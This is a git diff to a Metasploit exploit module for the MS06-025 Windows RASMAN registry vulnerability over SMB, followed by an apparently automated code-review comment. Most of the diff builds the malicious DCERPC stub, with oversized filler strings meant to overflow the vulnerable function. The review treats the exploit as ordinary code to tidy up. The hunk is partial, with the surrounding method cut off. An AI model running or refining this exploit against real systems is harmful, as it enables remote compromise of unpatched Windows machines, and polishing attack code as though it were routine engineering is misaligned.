diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index 7fae9c8d6c..45d0555795 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb 
@@ -54,64 +54,60 @@ class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote print_status("Binding to #{handle}") dcerpc_bind(handle) print_status("Bound to #{handle}") + + fuxorstring = "G" * 514 + #fuxorstring = "G" * 212 + "\\\\" + "g" * 42 + #fuxorstring = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Router\\CurrentVersion" type2 = - NDR.wstring("A" * 34) + # 34 length - NDR.wstring("B" * 258) + # 258 length - NDR.wstring("C" * 258) + # 258 length - NDR.long(1) + - NDR.long(1) + NDR.UnicodeConformantVaryingString("A" * 16) + # 34 length, UNMIDL 17 + NDR.UnicodeConformantVaryingString("B" * 128) + # 258 length, UNMIDL 129 + NDR.UnicodeConformantVaryingString("C" * 128) + # 258 length, UNMIDL 129 + NDR.long(4) + + NDR.long(4) - #fuxorstring = "G" * 212 + "\\\\" + "g" * 43 - #fuxorstring = "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Router\\CurrentVersion" - fuxorstring = "G" * 552 type1 = - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + - NDR.long(1) + type2 + # unique type 2 + NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc + NDR.UnicodeConformantVaryingString("D" * 127) + # 258 length, UNMIDL 129 + NDR.long(4) + + NDR.UnicodeConformantVaryingString("E" * 259) + # 520 length, UNMIDL 260 + NDR.UnicodeConformantVaryingString("F" * 259) + # 520 length, UNMIDL 260 - NDR.wstring("D" * 258) + # 258 length + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + + NDR.long(4) + - NDR.long(1) + - - 
NDR.wstring("E" * 520) + # 520 length - #NDR.wstring("F" * 86 + "\\" + "f" * 86 + "\\" + "F" * 86) + # 260 length - NDR.wstring("F" * 520) + # 520 length - - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - NDR.long(1) + - - #NDR.wstring(Rex::Text.pattern_create(257)) + # 257 length - NDR.wstring(fuxorstring) + # 514 length + NDR.UnicodeConformantVaryingString("G" * 256) + # 514 length, UNMIDL 257 - NDR.long(0) + - NDR.long(0) + NDR.long(4) + + NDR.long(4) - stubdata = type1 + NDR.long(1) - + stubdata = type1 + NDR.long(4) + print_status('Stub is ' + stubdata.length.to_s + ' bytes long.') print_status('Calling the vulnerable function...') begin
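Review bot: `fuxorstring = "G" * 514` is assigned on the new side but never read — the `NDR.wstring(fuxorstring)` call it used to feed was replaced by `NDR.UnicodeConformantVaryingString("G" * 256)`, so that assignment and the two commented-out alternatives above it are dead code and should be dropped rather than carried forward. The trailing `# … length, UNMIDL …` comments also disagree on one line: `"D" * 127` is annotated `258 length, UNMIDL 129`, while every other string follows the n+1 pattern (`"B" * 128` → 129, `"G" * 256` → 257); I can't tell from the hunk whether the literal or the comment is the intended one, but they should agree. Style-wise, the seventeen and eight consecutive `NDR.long(4) +` lines read as a single unit and, assuming `NDR.long` returns a String as the `+` concatenation suggests, could be written once as `NDR.long(4) * 17 +` without changing the resulting bytes. The enclosing method starts before this hunk and continues past `begin`.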